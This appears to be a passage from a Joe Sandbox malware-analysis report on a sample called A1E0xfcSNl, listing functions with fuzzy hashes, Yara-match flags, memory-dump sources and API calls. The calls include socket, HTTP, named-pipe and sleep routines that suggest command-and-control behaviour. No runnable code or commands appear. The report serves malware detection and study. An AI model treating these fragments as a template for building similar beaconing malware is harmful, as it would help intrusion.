                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            • Opcode ID: ad97ff94daebfa87eb6fd67f93cca161cff41d94620c9b26869a70ff35763801
                                            • Instruction ID: 2ee51eecad9493cc14d1c6d7d2f2ed2e1d05d9e34f530ea3857808423ef5ea53
                                            • Opcode Fuzzy Hash: ad97ff94daebfa87eb6fd67f93cca161cff41d94620c9b26869a70ff35763801
                                            • Instruction Fuzzy Hash: A572D463B3412007979CCB3DAC66BBA65D2B39824C748D83DF907E7B85E93CDD858642
                                            Function 0078CFF0 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                            • Instruction ID: 0389c154af453252257e488b5b7df696b980b11c5bb51702796bc646696bb7bb
                                            • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                            • Instruction Fuzzy Hash: 6F5251B221898587D708CB1CE4A173AB7E1F3C9B80F44852AE79B8B799CE3DD554DB10
                                            Function 007DDBF0 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                            • Instruction ID: aafc399d7e4bbde69e4fb112e9e5b6d7eff5d4844a68cc2952f4ea35cdb07adb
                                            • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                            • Instruction Fuzzy Hash: 075241B221898587D708CB1CE4A173AB7E1F3C9B80F44852AE79B8B799CE3DD555CB40
                                            Function 0078C680 Relevance: .6, Instructions: 592COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                            • Instruction ID: 4138ce9b76b35359f5dbb674d73d7ca9e76f01fe81a3875365ec93af667eb3c5
                                            • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                            • Instruction Fuzzy Hash: 265265B261858187D708CF1DE4A177AB7E1F3C9B80F44852AE78A8B798CA3DD555CF40
                                            Function 007DD280 Relevance: .6, Instructions: 592COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                            • Instruction ID: f7d5b9e0e15cc39e521c0b4f1634b9f0e8bceb1d5cdc8ec3756b375ad50db0f6
                                            • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                            • Instruction Fuzzy Hash: FE5254B261898187D708CF1DE4A173AB7E1F3CDB80F44852AE78A8B799CA3DD545CB50
                                            Function 00769680 Relevance: .4, Instructions: 404COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                            • Instruction ID: c7d6d2d7e9688d9dcc6d614aa0cc90bb7755dd7eeabb207a537260a430ee9031
                                            • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                            • Instruction Fuzzy Hash: 27E1A072718A42C6DB20CB26E4942AE77A9F795798F904115EF4F87B58EF3CC906CB40
                                            Function 007BA280 Relevance: .4, Instructions: 404COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                                            • Instruction ID: 93b9cae29101251b868eb53dffd54fc381df6fae46571b3245b69dc40b1302f9
                                            • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                                            • Instruction Fuzzy Hash: E8E1A472308A42A6DB20EB29E4947EE63B1F798788F904115EF4D87748EF3DC946CB41
                                            Function 0076CE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                            • Instruction ID: 9c4a19044d1ff4b4237145e897b7bfffd3b947f906fe07a605eeff690f7b984b
                                            • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                            • Instruction Fuzzy Hash: 60E17963B20B4187EB64CB65E8453AA73A2F789794F488125DF8F97A51EE7CE485C300
                                            Function 0076916C Relevance: .4, Instructions: 367COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                            • Instruction ID: c4ec250cd811fa789c5e7e2f7b8e09da87406006829cc5b66533175a04d41d06
                                            • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                            • Instruction Fuzzy Hash: E6D10472304B82D2DF21DF69E4902AE6769F795798B900112EF4F97A58EF3CC94AC740
                                            Function 007B9D6C Relevance: .4, Instructions: 367COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                                            • Instruction ID: f7c6faaf570a68894d8825b19b01a3b2db45d650ee87979f4b39f7a72d28a79b
                                            • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                                            • Instruction Fuzzy Hash: 02D1C273308A46A2DF20EB69D8943EE6761F7D8788F900112EB4E97658EF3DC946C741
                                            Function 00770334 Relevance: .2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                            • Instruction ID: d4cfdef6b144783b96840de23fd77abbcdb4013f1a6c5f542e75e659c6f8d09b
                                            • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                            • Instruction Fuzzy Hash: B9617A32B18B81C6EF209F61E48435E73A1F788BD4F409529EA4D87B54DF7CD8A48B81
                                            Function 007DCF97 Relevance: .1, Instructions: 134COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                            • Instruction ID: 73a990019c1e93cdb5d9817d2f45c07298e131fe79a8e9d4ec6aceafd6e54507
                                            • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                            • Instruction Fuzzy Hash: E9510DB6615A908BD714CB0DE49072AB7E1F3CC794F84421AE38F87768DA3CD545CB40
                                            Function 007B2980 Relevance: .1, Instructions: 104COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
                                            • Instruction ID: 4db5ec2c7fb43a9a47ec214fa30245ead044fe658cfceb898e81aca4ae71f15d
                                            • Opcode Fuzzy Hash: 2c3933de69a5c45a691f66366f44db72dbce692affb8ab9f513b25421ed8e079
                                            • Instruction Fuzzy Hash: 352183A3F3421007979CCA3D9C267BA65D6B394248359C83DF807E7B85D93CED898282
                                            Function 007E2020 Relevance: .0, Instructions: 37COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                                            • Instruction ID: 216ad519183f9419ee1cc9b90ab589d6ca6c467801b32d3438b780bb7bea228d
                                            • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                                            • Instruction Fuzzy Hash: 3CF0BDDBF5FAE04AD22357660C7A2582F69A4BAA2138DC15F8B80536D3E44E1C17D322
                                            Function 004542E4 Relevance: .0, Instructions: 13COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                            • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                                            • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                            • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                                            Function 007E2630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                            • Instruction ID: c9729762c3f6791deb7e4c1da03920ef8ee42a014601445400a2e350f20cbbfb
                                            • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                            • Instruction Fuzzy Hash: 14D0A7EBF1FBD009E36393294C2D2482F64B1A6A2174C418FC7800B7A3E44E1C03C311
                                            Function 007E2050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                            • Instruction ID: 4b0d6f3c38fdb4992a28d4c29ff4de91c9e45e4cdc404adf67c05d6223a33232
                                            • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                                            • Instruction Fuzzy Hash: DCC04C57A559D04797225A15086A1542B56E5D7D3238A82998D5143D87900E5C17E311
                                            Function 007E24F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                            • Instruction ID: 1df5ddff5bd793e948fa5e9961ea76d0132f60b4744e8db752e6bbfcaa088167
                                            • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                            • Instruction Fuzzy Hash: 7DC012DBE1FEC04AF32382690C7A42E2EA494FB91030E608ACF8402293A14E0C225261
                                            Function 00402F62 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                            • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                                            • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                            • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                                            Function 007E2078 Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                            • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                                            • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                            • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                                            Function 007C6BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: acceptioctlsocket$closesockethtonlselect
                                            • String ID:
                                            • API String ID: 2003300010-0
                                            • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                            • Instruction ID: bb128c0f82dcfd230e73372f997504decf17c4317679c195ce761b72f2b1ae07
                                            • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                            • Instruction Fuzzy Hash: 89919B72610A91DBDB20DF25E984BAD33B5F788798F40412AEB4D87B58DF38D665CB00
                                            Function 007BEC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                            • String ID: %s%s$*/*
                                            • API String ID: 3787158362-856325523
                                            • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                            • Instruction ID: dc4d12832121c8273b3fb7dd9a449dd0ff8499d6d7d883b4795c3e38b8ecfd70
                                            • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                            • Instruction Fuzzy Hash: D5719932708B85CAEB10DF65E8847E977A1F398B88F44012AEA4E43769DF7CD50AC740
                                            Function 007C53E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                            • String ID:
                                            • API String ID: 34948862-0
                                            • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                            • Instruction ID: e44228b2950c57fae51fd6f4e9e2329dfcd5e69ff83efca01a76b2675d86cd15
                                            • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                            • Instruction Fuzzy Hash: 51417A32704F44C6EB10DB61E858BAD336AF788BA4F544228DE2E57BA5DF3DD4968700
                                            Function 007CFE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 007CFE36
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007CFE42
                                            • __crtIsPackagedApp.LIBCMT ref: 007CFE53
                                            • AreFileApisANSI.KERNEL32 ref: 007CFE62
                                            • MultiByteToWideChar.KERNEL32 ref: 007CFE88
                                            • GetLastError.KERNEL32 ref: 007CFE95
                                            • _dosmaperr.LIBCMT ref: 007CFE9D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1138158220-0
                                            • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                            • Instruction ID: 3baccc9280623390eff9989b6e88aeab6719df8e4fd585f647fca4af3c78e8bd
                                            • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                            • Instruction Fuzzy Hash: 5D219D32705B4486EB24AF76E80872D67E6BB88BA4F54463DDA49477A6DF3CC4418700
                                            Function 007CFF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 4099253644-0
                                            • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                            • Instruction ID: 964329dacca8d202794ebe75baa95e7a41d6936fc7c1e94c9d90d4d7da1c714d
                                            • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                            • Instruction Fuzzy Hash: 7F313E25A06A42C1FF55EF51E86473823A2FB88B94F08163EDE5D063A1DF7CD844C311
                                            Function 007C7308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                            • String ID: d
                                            • API String ID: 1257931466-2564639436
                                            • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                            • Instruction ID: 2cee83ec675d99c2291e55027331306dd3382853370d6813cfdfcd591b39a63a
                                            • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                            • Instruction Fuzzy Hash: D1318D32219BC5D6DB25CF61E84479A77A8F788B88F04512AEE8D47B28DF7CC555CB00
                                            Function 00781B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: write_multi_char$write_string$free
                                            • String ID:
                                            • API String ID: 2630409672-3916222277
                                            • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                            • Instruction ID: a1a4250d362e4ca9cc82363142c750dbaa3ecb25d79ff04b9fc37ab3d55a5f55
                                            • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                            • Instruction Fuzzy Hash: F5910232688784C6EB21EB65E8083AE7B74F785795F641006EF8E57B59DB3CC942CB00
                                            Function 007C71FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$ErrorLastSleepselectsend
                                            • String ID: d
                                            • API String ID: 2152284305-2564639436
                                            • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                            • Instruction ID: d884567ad3b756e569540b95a48ff097b10d056b599a170f55b598bcf10f27e4
                                            • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                            • Instruction Fuzzy Hash: BE219D32618AC086D7608F21F88878E7375F788784F404269EB9D87A59DF3CD459CB44
                                            Function 007BFB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
